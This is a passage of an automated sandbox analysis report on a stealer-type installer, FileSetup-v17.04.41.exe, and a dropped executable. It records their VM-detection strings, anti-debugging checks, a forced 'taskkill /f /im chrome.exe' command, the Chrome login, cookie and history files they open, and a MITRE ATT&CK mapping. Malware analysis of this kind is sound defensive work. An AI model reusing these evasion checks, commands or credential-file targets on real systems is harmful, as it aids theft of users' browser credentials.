Source: ecvAA35.tmp.11.dr | Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150352Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9adc5de308f048a794c5e60e88191707&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=838177&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=838177&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6852B33702F6B3BD.exe, 00000004.00000003.286872651.0000000003CA1000.00000004.00000001.sdmp | Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.262107276.00000000021E1000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: 6852B33702F6B3BD.exe, 00000004.00000003.259727824.000000000226D000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289558161.000000000220D000.00000004.00000001.sdmp | Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287164919.0000000003CA7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 6852B33702F6B3BD.exe, 00000005.00000002.288732757.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterHB
Source: 6852B33702F6B3BD.exe, 00000005.00000002.288732757.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287164919.0000000003CA7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287599977.0000000003CAD000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces 
ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}*
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305115180.0000000003D14000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1611946678493.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,4_2_10019FF0

Hides threads from debuggers
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Process queried: DebugFlags
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_00490470 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00490470
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_00496048 mov eax, dword ptr fs:[00000030h] 1_2_00496048
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_00496075 mov eax, dword ptr fs:[00000030h] 1_2_00496075
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_0049602F mov eax, dword ptr fs:[00000030h] 1_2_0049602F
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h] 4_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h] 4_2_10019ED0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_004AA130 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__write_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004AA130
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_00490470 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00490470
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,4_2_10015354
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,4_2_10015376
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,4_2_10018413
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 29_2_00BF461F SetUnhandledExceptionFilter,29_2_00BF461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 29_2_00BF1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00BF1C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 29_2_00BF373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00BF373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 29_2_00BF631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00BF631F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,4_2_1001A0F0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_004A661B cpuid 1_2_004A661B
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0048E010
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,1_2_004A6688
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,1_2_004A67C3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004A47EC
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004A67FE
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_004A693B
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_004A4E48
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_004990E2
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_004A5099
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: GetLocaleInfoA,4_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA,29_2_00BF7189
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,4_2_10019780
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_00492AD9 GetSystemTimeAsFileTime,1_2_00492AD9
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Code function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

The matrix is listed here per tactic column, in the report's row order; the number in parentheses is the per-technique match count the report attaches to that technique.

Initial Access: Valid Accounts (1); Replication Through Removable Media (1); Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Windows Management Instrumentation (1); Native API (1); Command and Scripting Interpreter (2); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: DLL Side-Loading (1); Application Shimming (1); Valid Accounts (1); Browser Extensions (1); Bootkit (1); Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Application Shimming (1); Valid Accounts (1); Access Token Manipulation (1); Process Injection (11); Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Install Root Certificate (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (13); Process Injection (11); Bootkit (1)
Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: System Time Discovery (1); Peripheral Device Discovery (11); File and Directory Discovery (4); System Information Discovery (58); Query Registry (2); Security Software Discovery (451); Virtualization/Sandbox Evasion (13); Process Discovery (3); Remote System Discovery (11); System Network Configuration Discovery (1); Permission Groups Discovery; Local Groups
Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
Collection: Archive Collected Data (11); Man in the Browser (1); Data from Local System (1); Input Capture (1); Clipboard Data (1); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (2); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
